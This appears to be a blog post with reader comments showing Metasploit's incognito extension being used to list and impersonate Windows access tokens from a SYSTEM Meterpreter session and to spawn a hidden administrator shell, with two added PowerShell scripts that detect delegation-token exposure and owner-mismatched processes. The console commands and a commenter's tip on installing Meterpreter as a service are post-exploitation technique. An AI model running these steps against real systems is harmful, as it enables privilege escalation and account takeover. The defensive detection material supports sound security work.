The background you need is here:
http://www.mwrinfosecurity.com/publications/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf
Let's set up the scenario.
We either exploited something...yea! or we guessed an admin password and used the psexec module (that's what I did). The psexec module will drop us to a SYSTEM shell if all went well.
msf exploit(psexec) > sessions
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.102:52595 -> 192.168.1.103:31851
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: ORACLE-ENT
OS : Windows .NET Server (Build 3790, Service Pack 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use incognito
Loading extension incognito...success.
Now we want to query what tokens are available.
Incognito Commands
==================
Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter > list_tokens
Usage: list_tokens
Lists all accessible tokens and their privilege level
OPTIONS:
-g List tokens by unique groupname
-u List tokens by unique username
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
ORACLE-ENT\Administrator
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
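A defender's-side view of the same information, added here as an example and not part of the original post: the PowerShell below (assumed to be run as an administrator on a Windows host with the CIM cmdlets available) enumerates the logon sessions on the local machine and labels each one with the token level that logon type normally leaves behind, so you can see which privileged accounts are leaving delegation-level tokens on a box before someone with SYSTEM runs list_tokens. The logon-type to token-level mapping is the general rule from the MWR paper (interactive, RDP, service and batch logons leave delegation tokens; plain network logons only impersonation tokens); the WatchAccounts default is an assumed list to adjust per environment.

```powershell
# Added example, not from the original post. Lists logon sessions on the local host
# and marks the ones whose logon type normally yields a delegation-level token, i.e.
# the sessions incognito would show under "Delegation Tokens Available".
# Assumptions: run with administrative rights on a Windows host with the CIM cmdlets
# (PowerShell 3+); account names are the built-in English ones.

# Win32_LogonSession.LogonType values as documented by Microsoft.
$LogonTypeNames = @{
    0 = 'System'; 2 = 'Interactive'; 3 = 'Network'; 4 = 'Batch'; 5 = 'Service'
    7 = 'Unlock'; 8 = 'NetworkCleartext'; 9 = 'NewCredentials'
    10 = 'RemoteInteractive'; 11 = 'CachedInteractive'
}

# Logon types whose sessions keep credentials on the box and therefore hand out
# delegation-level tokens (the general rule from the MWR paper). Network logons
# (type 3) normally yield impersonation-level tokens only.
$DelegationLogonTypes = 0, 2, 4, 5, 7, 10, 11

function Get-LogonSessionExposure {
    [CmdletBinding()]
    param(
        # Accounts to highlight in the output; assumed default, tune locally.
        [string[]]$WatchAccounts = @('Administrator')
    )

    # Index logon sessions by LogonId so the account links can be joined to them.
    $sessionsById = @{}
    foreach ($s in Get-CimInstance -ClassName Win32_LogonSession) {
        $sessionsById[$s.LogonId] = $s
    }

    # Win32_LoggedOnUser links an account (Antecedent) to a logon session (Dependent).
    foreach ($link in Get-CimInstance -ClassName Win32_LoggedOnUser) {
        $session = $sessionsById[$link.Dependent.LogonId]
        if (-not $session) { continue }
        $type = [int]$session.LogonType
        [pscustomobject]@{
            Account    = '{0}\{1}' -f $link.Antecedent.Domain, $link.Antecedent.Name
            LogonId    = $session.LogonId
            LogonType  = if ($LogonTypeNames.ContainsKey($type)) { $LogonTypeNames[$type] } else { "Unknown($type)" }
            TokenLevel = if ($DelegationLogonTypes -contains $type) { 'Delegation' } else { 'Impersonation' }
            Watched    = [bool]($WatchAccounts -contains $link.Antecedent.Name)
            StartTime  = $session.StartTime
        }
    }
}

# Watched accounts first, delegation-level sessions before impersonation-level ones.
Get-LogonSessionExposure |
    Sort-Object @{ Expression = 'Watched'; Descending = $true }, TokenLevel, Account |
    Format-Table -AutoSize
```

A delegation-level session for a watched account on a host that does not need it (an admin who RDP'd in and never logged off, a service running as a domain admin) is exactly what the ORACLE-ENT\Administrator entry above represents; the fix is operational (log off, run the service under a lower-privilege account) rather than anything incognito itself can be blocked from reading once SYSTEM is held.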
We want to become the ORACLE-ENT\Administrator user
meterpreter > impersonate_token
Usage: impersonate_token
Instructs the meterpreter thread to impersonate the specified token. All other actions
will then be made in the context of that token.
Hint: Double backslash DOMAIN\\name (meterpreter quirk)
Hint: Enclose with quotation marks if name contains a space
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator
Weeeeeeeeee!
Ok, should you need to get back to system, just do a rev2self
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token ORACLE-ENT\\Administrator
[+] Delegation token available
[+] Successfully impersonated user ORACLE-ENT\Administrator
meterpreter > getuid
Server username: ORACLE-ENT\Administrator
Now you'll probably want to run commands as that user...I hope that was the point of all this...
After you load the incognito extension, execute gains an extra option (-t):
meterpreter > execute
Usage: execute -f file [options]
Executes a command on the remote machine.
OPTIONS:
-H Create the process hidden from view.
-a The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d The 'dummy' executable to launch when using -m.
-f The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-m Execute from memory.
-t Execute process with currently impersonated thread token
We need to use "-t" so the new process is created with the impersonated thread token; otherwise you'll get a shell as SYSTEM (or whoever you were before impersonating).
meterpreter > execute -f cmd.exe -H -c -i -t
Process 2936 created.
Channel 6 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\>whoami
whoami
oracle-ent\administrator
C:\>
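The same shell seen from the defender's side, added here as an example and not part of the original post: a process launched with execute -t is owned by the impersonated user while its parent (the Meterpreter host process) is still owned by SYSTEM, and that owner mismatch between parent and child can be hunted for with nothing more than WMI. Assumptions: run as an administrator with the CIM cmdlets available; the IgnoreParents list is an assumed starting point for legitimate session-0 hand-offs and will need tuning; PID reuse can occasionally pair a child with a newer process that inherited its parent's PID.

```powershell
# Added example, not from the original post. Reports running processes whose owner
# differs from their parent process's owner. A cmd.exe started with "execute -t"
# under an impersonated token shows up as ORACLE-ENT\Administrator with a parent
# owned by NT AUTHORITY\SYSTEM.
# Assumptions: run with administrative rights; GetOwner() fails for protected
# processes, which are reported as "(unknown)" and skipped from the comparison.

function Get-ProcessOwnerName {
    param([Microsoft.Management.Infrastructure.CimInstance]$Process)
    try {
        $owner = Invoke-CimMethod -InputObject $Process -MethodName GetOwner -ErrorAction Stop
        if ($owner.ReturnValue -eq 0) { return '{0}\{1}' -f $owner.Domain, $owner.User }
    } catch { }
    return '(unknown)'
}

function Get-OwnerMismatch {
    [CmdletBinding()]
    param(
        # Parents that legitimately spawn children under another identity
        # (logon hand-offs, service control). Assumed list; tune to the environment.
        [string[]]$IgnoreParents = @('winlogon.exe', 'userinit.exe', 'services.exe')
    )

    $procs  = Get-CimInstance -ClassName Win32_Process
    $byId   = @{}
    $owners = @{}
    foreach ($p in $procs) {
        $byId[[int]$p.ProcessId]   = $p
        $owners[[int]$p.ProcessId] = Get-ProcessOwnerName $p
    }

    foreach ($p in $procs) {
        $parent = $byId[[int]$p.ParentProcessId]
        if (-not $parent) { continue }                        # parent already exited
        if ($IgnoreParents -contains $parent.Name) { continue }

        $childOwner  = $owners[[int]$p.ProcessId]
        $parentOwner = $owners[[int]$parent.ProcessId]
        if ($childOwner -eq '(unknown)' -or $parentOwner -eq '(unknown)') { continue }

        if ($childOwner -ne $parentOwner) {
            [pscustomobject]@{
                ProcessId   = $p.ProcessId
                Name        = $p.Name
                Owner       = $childOwner
                ParentId    = $parent.ProcessId
                ParentName  = $parent.Name
                ParentOwner = $parentOwner
                CommandLine = $p.CommandLine
            }
        }
    }
}

Get-OwnerMismatch | Format-Table -AutoSize
```

On a quiet server the output is short, and a command shell owned by an administrator whose parent is a SYSTEM-owned process with an unfamiliar name is worth a look; on a busy workstation expect noise from elevation and scheduled tasks, which is why the ignore list is a parameter rather than a constant.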
Completely awesome! Thanks for the post, and the MWR Infosecurity paper reference.

Chris.. once again, you rock.

Is the "find_token REMOTEHOST" command going to be implemented in this incognito extension for meterpreter?

Thanks for the post, the MWR Infosecurity paper was a really good read.

Hey CG,
Nice post, is there any easy way to become system from administrator and then use incognito? The impersonation has failed for me if I get a meterpreter shell as Admin user (e.g. by using msfpayload) and not as system by exploiting stuff.
I have tried becoming admin to system first and that worked, but then becoming system to some other user, again failed.
Any comments?

I'd set up meterpreter binary as a service or using at/sc. Your connect back should be as system and the token tools should work for you.